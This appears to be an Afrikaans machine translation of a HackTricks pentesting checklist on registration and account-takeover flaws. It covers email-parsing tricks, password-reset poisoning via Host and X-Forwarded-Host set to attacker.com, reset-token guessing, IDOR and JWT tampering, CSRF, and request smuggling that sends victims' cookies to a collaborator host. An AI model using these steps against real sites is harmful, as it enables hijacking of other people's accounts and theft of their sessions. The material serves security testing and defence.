Registration & Takeover Vulnerabilities
Last updated
Last updated
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Probeer om te genereer met 'n bestaande gebruikersnaam
Kyk na verskillende e-pos:
hoofletters
+1@
voeg 'n punt in die e-pos by
spesiale karakters in die e-pos naam (%00, %09, %20)
Sit swart karakters na die e-pos: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Kyk of jy kan uitvind wanneer 'n gebruikersnaam reeds binne die toepassing geregistreer is.
Skep 'n gebruiker en kyk na die wagwoordbeleid (kyk of jy swak wagwoorde kan gebruik). In daardie geval kan jy probeer om akrediteer te bruteforce.
Kyk na hierdie bladsy om te leer hoe om rekeningoorname te probeer of inligting te onttrek via SQL Inbrake in registrasievorms.
Wanneer geregistreer, probeer om die e-pos te verander en kyk of hierdie verandering korrek geverifieer word of of jy dit na arbitrêre e-posse kan verander.
Kyk of jy weggooie e-posse kan gebruik
Lang wagwoord (>200) lei tot DoS
Kyk na koerslimiete op rekening skep
Gebruik username@burp_collab.net en analiseer die terugroep
Versoek wagwoord herstel na jou e-pos adres
Klik op die wagwoord herstel skakel
Moet nie wagwoord verander nie
Klik op enige 3de party webwerwe (bv: Facebook, twitter)
Intercepteer die versoek in Burp Suite proxy
Kyk of die verwysingskop lek wagwoord herstel token.
Intercepteer die wagwoord herstel versoek in Burp Suite
Voeg of wysig die volgende koppe in Burp Suite : Host: attacker.com
, X-Forwarded-Host: attacker.com
Stuur die versoek met die gewysigde kop
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Soek na 'n wagwoord herstel URL gebaseer op die host kop soos : https://attacker.com/reset-password.php?token=TOKEN
Aanvaller moet met hul rekening aanmeld en na die Verander wagwoord funksie gaan.
Begin die Burp Suite en onderskep die versoek.
Stuur dit na die herhaler-oortjie en wysig die parameters: Gebruiker ID/e-pos
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Die wagwoord herstel token moet ewekansig gegenereer en uniek wees elke keer. Probeer om te bepaal of die token verval of as dit altyd dieselfde is, in sommige gevalle is die generasie-algoritme swak en kan dit geraai word. Die volgende veranderlikes mag deur die algoritme gebruik word.
Tydstempel
GebruikerID
E-pos van Gebruiker
Voornaam en Van
Geboortedatum
Kriptografie
Slegs nommers
Klein token volgorde (karakters tussen [A-Z,a-z,0-9])
Token hergebruik
Token vervaldatum
Trigger 'n wagwoord herstel versoek deur die API/UI vir 'n spesifieke e-pos bv: test@mail.com
Ondersoek die bediener se antwoord en kyk vir resetToken
Gebruik dan die token in 'n URL soos https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Registreer op die stelsel met 'n gebruikersnaam wat identies is aan die slagoffer se gebruikersnaam, maar met spasie voor en/of na die gebruikersnaam ingevoeg. bv: "admin "
Versoek 'n wagwoord herstel met jou kwaadwillige gebruikersnaam.
Gebruik die token wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
Maak verbinding met die slagoffer se rekening met die nuwe wagwoord.
Die platform CTFd was kwesbaar vir hierdie aanval. Sien: CVE-2020-7245
Vind 'n XSS binne die toepassing of 'n subdomein as die koekies op die ouerdomein geskope is: *.domain.com
Lek die huidige sessies koekie
Verifieer as die gebruiker met behulp van die koekie
1. Gebruik smuggler om die tipe HTTP Versoek Smuggling (CL, TE, CL.TE) te detecteer
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Stel 'n versoek op wat die POST / HTTP/1.1
met die volgende data sal oorskryf:
GET http://something.burpcollaborator.net HTTP/1.1 X:
met die doel om die slagoffers na burpcollab te herlei en hul koekies te steel
3. Finale versoek kan soos volg lyk
Hackerone verslae wat hierdie fout benut * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Skep 'n payload vir die CSRF, bv: “HTML vorm met outomatiese indiening vir 'n wagwoord verandering”
Stuur die payload
JSON Web Token kan gebruik word om 'n gebruiker te verifieer.
Wysig die JWT met 'n ander Gebruiker ID / E-pos
Kontroleer vir swak JWT handtekening
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)